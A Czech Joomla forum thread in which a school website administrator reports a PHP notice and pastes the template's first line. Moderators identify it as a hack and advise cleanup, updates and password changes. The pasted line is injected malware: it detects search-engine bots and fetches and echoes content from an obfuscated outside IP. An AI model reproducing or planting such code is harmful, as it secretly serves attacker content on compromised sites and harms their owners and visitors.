Joomla 5.2.2 Security & Bugfix Release
Joomla 5.2.2 je nyní k dispozici. Jedná se o bezpečnostní vydání pro Joomla 5.x.
Notice: Use of undefined constant HTTP_USER_AGENT
24. úno 2020 11:06 #141805
Dobrý den, spravuji školní stránky v Joomle a najednou se objevila tato hláška, která se zobrazuje na všech stránkách webu: Notice: Use of undefined constant HTTP_USER_AGENT - assumed 'HTTP_USER_AGENT' in /volume1/web/joomla/templates/zstgm/index.php on line 1 . V 1. řádce toho souboru je tohle:
<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if ((strpos($botbotbot,"google")) OR (strpos($botbotbot,"bing")) OR (strpos($botbotbot,"yahoo"))){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}?><?php
defined('_JEXEC') or die;
Je potřeba něco změnit, nebo provést nějakou aktualizaci? Adresa webu je zstgm-podborany.cz Děkuji předem za nějakou radu.
<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if ((strpos($botbotbot,"google")) OR (strpos($botbotbot,"bing")) OR (strpos($botbotbot,"yahoo"))){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}?><?php
defined('_JEXEC') or die;
Je potřeba něco změnit, nebo provést nějakou aktualizaci? Adresa webu je zstgm-podborany.cz Děkuji předem za nějakou radu.
24. úno 2020 14:10 - 24. úno 2020 14:16 #141807
I'm sorry, my responses are limited...you must ask the right questions.
Odpověď od Bong
Moderátor
Stránky jsou nedostupné. Při pokusu kontaktovat server zstgm-podborany.cz vypršel časový limit.
Neco jste upravoval - instaloval? Nebo vám je odstavili? Nemáte je hacknuté?
Neco jste upravoval - instaloval? Nebo vám je odstavili? Nemáte je hacknuté?
I'm sorry, my responses are limited...you must ask the right questions.
24. úno 2020 15:33 #141808
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
Odpověď od Rudolf
Joomla Expert
Ano,
obraťte se na programátora, který ten programový nesmysl přidal na začátek do souboru /volume1/web/joomla/templates/zstgm/index.php aniž nadefinoval konstantu HTTP_USER_AGENT aby to po sobě opravil.
Vypnout hlášení chyb v joomla také můžete, ale tím chyba nezmizí, jen se přestane zobrazovat a při každém zobrazení se zapíše do logu na serveru - to je také chyba.
obraťte se na programátora, který ten programový nesmysl přidal na začátek do souboru /volume1/web/joomla/templates/zstgm/index.php aniž nadefinoval konstantu HTTP_USER_AGENT aby to po sobě opravil.
Vypnout hlášení chyb v joomla také můžete, ale tím chyba nezmizí, jen se přestane zobrazovat a při každém zobrazení se zapíše do logu na serveru - to je také chyba.
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
24. úno 2020 16:16 #141809
Odpověď od Jarda
Uživatel
Tak problém vyřešen. Odstranil jsem ten nesmysl z první řádky a už se to nezobrazuje. Netuším, kde se to tam vzalo, několik let to fungovalo v pořádku. Verze Joomly ale bylo 3.4.neco a ted jsem tam dal 3.6.5, nabízí to ještě verzi 3.9.15 ale mám obavy zda bude vše fungovat tak jak má.
24. úno 2020 16:25 - 24. úno 2020 16:25 #141810
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
Odpověď od Rudolf
Joomla Expert
To je možná klasická ukázka hacknutí webu
Jakmile jdete na web Vy, nevidíte žádnou chybu, jakmile jde nějaký bot (google, bing...) něco se stane a přidá sem:
http://$xxx.31.253.227/cakes/?.....
Jakmile jdete na web Vy, nevidíte žádnou chybu, jakmile jde nějaký bot (google, bing...) něco se stane a přidá sem:
http://$xxx.31.253.227/cakes/?.....
MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla
25. úno 2020 10:41 - 25. úno 2020 10:42 #141811
Problém vůbec není vyřešen. Stránky máte hacknuté a dá se na nich stále detekovat malware (viz příloha).
Musíte web vyčistit, aktualizovat na poslední verze (Joomlu i všechna rozšíření), změnit všechna přístupová hesla (Joomla, FTP, databáze i hosting) a provést alespoň základní zabezpečení.
To by nemělo být až zase tak náročné, stránky nemáte složité. Ale hlavně se zbavte té "nejoomlovské" fotogalerie, kterou tam provozujete. To je pravděpodobně ta největší bezpečnostní díra.
Postupujte bod po bodu podle článku Jak zachránit hacknutou Joomlu .
I'm sorry, my responses are limited...you must ask the right questions.
Odpověď od Bong
Moderátor
Jarda napsal: Tak problém vyřešen.
Problém vůbec není vyřešen. Stránky máte hacknuté a dá se na nich stále detekovat malware (viz příloha).
Musíte web vyčistit, aktualizovat na poslední verze (Joomlu i všechna rozšíření), změnit všechna přístupová hesla (Joomla, FTP, databáze i hosting) a provést alespoň základní zabezpečení.
To by nemělo být až zase tak náročné, stránky nemáte složité. Ale hlavně se zbavte té "nejoomlovské" fotogalerie, kterou tam provozujete. To je pravděpodobně ta největší bezpečnostní díra.
Postupujte bod po bodu podle článku Jak zachránit hacknutou Joomlu .
I'm sorry, my responses are limited...you must ask the right questions.